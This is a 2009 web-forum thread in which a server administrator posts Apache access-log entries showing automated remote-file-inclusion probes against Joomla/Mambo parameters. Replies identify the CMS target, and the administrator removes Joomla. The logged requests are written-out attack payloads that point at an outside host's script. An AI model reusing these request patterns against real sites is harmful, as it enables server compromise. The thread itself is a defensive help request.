PDA

View Full Version : How To Stop Attacks Coming From 'localhost.localdomain'?

giganet
27th March 2009, 07:19
Hello Group...

Tonight I was looking over various logs in one of my servers and found when running 'tail -f /var/log/apache2/access.log' I see what appears to be an attack !!!???

The output of 'tail -f /var/log/apache2/access.log'

localhost.localdomain - - [26/Mar/2009:13:07:10 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?option=com_zoom&Itemid=38//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:09:50 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:11:15 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:15:11 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:15:12 -0700] "GET /?path%255Bdocroot%255D=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:17:38 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:17:39 -0700] "GET /?reflect_base=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:24:39 -0700] "GET /?option=com_content&v...i-asterisk-1-6-x&Itemid=6//%3fmosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"
localhost.localdomain - - [26/Mar/2009:13:24:40 -0700] "GET /?mosConfig_absolute_path=http://ecology41.t35.com/scans/damn/id.txt%3f%3f%3f HTTP/1.1" 200 4613 "-" "libwww-perl/5.805"


Thanking you in advance for your help.

Best Regards
robilaur
27th March 2009, 13:28
delete id.txt and ban user :D
Ben
27th March 2009, 14:35
Looks like an attack to joomla or similar cms?
When googling for some of the parameter, e.g. mosConfig_absolute_path or reflect_base it looks like moscms or joomla.
giganet
27th March 2009, 18:50
Thank you for the replies...

Robilaur:

I searched the box for 'id.txt' but this file is non-existent.

Also, how would I go about banning the user?
I am not seeing any particular IP he is coming from, only 'localhost.localdomain'?


Ben:

Hmm, I never did personally like Joomla and the application has yet to been used so I just removed it entirely from the server.

But I would still like to know how to ban the 'user' responsible though, your suggestions are very welcome.

Thank you for your help...

Best Regards